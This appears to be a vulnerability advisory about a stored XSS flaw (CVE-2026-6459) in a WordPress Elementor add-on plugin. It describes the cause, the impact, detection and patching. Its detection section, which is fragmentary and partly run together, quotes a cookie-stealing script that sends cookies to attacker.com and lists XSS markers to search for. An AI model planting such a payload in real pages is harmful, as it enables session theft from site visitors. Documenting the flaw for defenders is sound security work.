
PEACH
Un cadre d’isolation des locataires
CVE-2026-6459 is a Stored Cross-Site Scripting (XSS) vulnerability in the Essential Addons for Elementor – Popular Elementor Templates & Widgets plugin for WordPress. It affects all versions up to and including 6.6.2, stemming from insufficient input sanitization and output escaping on event titles sourced from The Events Calendar plugin via the Event Calendar widget. The vulnerability was published on July 8, 2026, and a patch was made available the same day. It carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting), specifically a stored XSS variant. The plugin fails to properly sanitize event titles ingested from The Events Calendar plugin before rendering them through the Event Calendar widget in Elementor-built pages. An authenticated attacker with Author-level access or higher can craft a malicious event title containing arbitrary JavaScript, which is then stored and subsequently executed in the browsers of any visitor accessing the affected page — no user interaction beyond page visit is required. The fix is tracked in the plugin's SVN changeset (WordPress Trac, GitHub Advisory).
Successful exploitation allows authenticated attackers to persistently inject malicious JavaScript into WordPress pages, which executes in the context of any visitor's browser. This can result in session token theft, unauthorized actions performed on behalf of victims (including privilege escalation if an administrator visits the page), content manipulation, and redirection to malicious sites. The scope is changed (S:C), meaning the injected script can affect resources beyond the vulnerable component itself, though availability is not directly impacted (Wordfence, GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).wp_posts or related Events Calendar tables containing <script>, javascript:, onerror=, or other XSS payloads.wp-content/plugins/essential-addons-for-elementor-lite/ that may indicate secondary tampering after initial compromise.Site administrators should update the Essential Addons for Elementor plugin to a version beyond 6.6.2, which includes the fix introduced in SVN changeset 3519453 (WordPress Trac). As interim mitigations, restrict Author-level and above permissions to only fully trusted users, and implement a Content Security Policy (CSP) header to limit the impact of any injected scripts. Regularly audit user roles and monitor event entries in The Events Calendar for suspicious content (Wordfence).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."